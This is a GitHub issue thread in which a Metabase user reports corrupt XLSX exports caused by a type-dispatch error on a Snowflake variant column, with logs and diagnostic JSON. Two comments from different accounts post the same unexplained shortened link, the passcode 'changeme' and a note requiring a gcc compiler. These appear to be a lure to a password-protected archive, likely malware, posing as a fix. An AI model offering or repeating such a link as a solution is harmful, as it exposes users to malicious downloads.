### ISSUE TITLE
XLSX exports giving invalid file format error

### ISSUE THREAD

**Issue by jamangile** [metabase/metabase#47670]
**Describe the bug**
When I export [this report](https://yellow-card-financial.metabaseapp.com/question#eyJkYXRhc2V0X3F1ZXJ5Ijp7ImRhdGFiYXNlIjo2LCJ0eXBlIjoicXVlcnkiLCJxdWVyeSI6eyJzb3VyY2UtdGFibGUiOjI3MSwiZmlsdGVyIjpbImFuZCIsWyI9IixbImZpZWxkIiw1MzUxLHsiYmFzZS10eXBlIjoidHlwZS9UZXh0In1dLCJtZnMiXSxbImJldHdlZW4iLFsiZmllbGQiLDUzNTQseyJiYXNlLXR5cGUiOiJ0eXBlL0RhdGVUaW1lIn1dLCIyMDI0LTA5LTAxIiwiMjAyNC0wOS0wNSJdXX19LCJkaXNwbGF5IjoidGFibGUiLCJ2aXN1YWxpemF0aW9uX3NldHRpbmdzIjp7fSwib3JpZ2luYWxfY2FyZF9pZCI6bnVsbCwidHlwZSI6InF1ZXN0aW9uIn0=) into xlsx and open I get an "Invalid file format" error. I have tested with the following environments:
* Microsoft Excel
* MacOS Numbers
* Google Sheets

**Logs**
Below is what I could extract from the Google Sheets export
```json
{
    "status":"failed",
    class:"class clojure.lang.ExceptionInfo",
    error:"Error reducing result rows: Multiple methods in multimethod 'global-type-settings' match dispatch value: :type/SnowflakeVariant -> :type/Temporal and :type/Number	and neither is preferred"
}
```

**To Reproduce**
1. Go to the above report link.
2. Click on the cloud icon on the bottom right. Tooltip should read "Download full results".
3. Scroll down to .xlsx
4. Download the file
5. Open the file in either
  * Microsoft Excel
  * MacOS Numbers
  * Google Sheets

**Expected behavior**
I except the file to have the data as shown in the Metabase link.

**Screenshots**
<img width="1465" alt="Screenshot 2024-09-05 at 15 04 09" src="https://github.com/user-attachments/assets/c865cda4-48ca-4609-9e7a-563295291623">

**Severity**
It it blocking my treasury team from validating reconciliations for the month.
In some instances, it is blocking processing of withdrawals.

**Additional context**
The problem appears to be with this report only. I have tested others and I am able to open them.

**Metabase Diagnostic Info**

```json
{
  "browser-info": {
    "language": "en-US",
    "platform": "MacIntel",
    "userAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36",
    "vendor": "Google Inc."
  },
  "metabase-info": {
    "databases": [
      "snowflake"
    ],
    "run-mode": "prod",
    "plan-alias": "pro-cloud",
    "version": {
      "date": "2024-08-29",
      "tag": "v1.50.23",
      "hash": "7040ff1"
    }, /// I cannot confirm this.
    "settings": {
      "report-timezone": "Africa/Lagos"
    },
    "hosting-env": "aws",
    "application-database": "unknown"
  }
}
```

**Comment by fayaznasrati** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by OldSnailCPP** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by paoliniluis** [comment]
@jamangile please contact our helpdesk
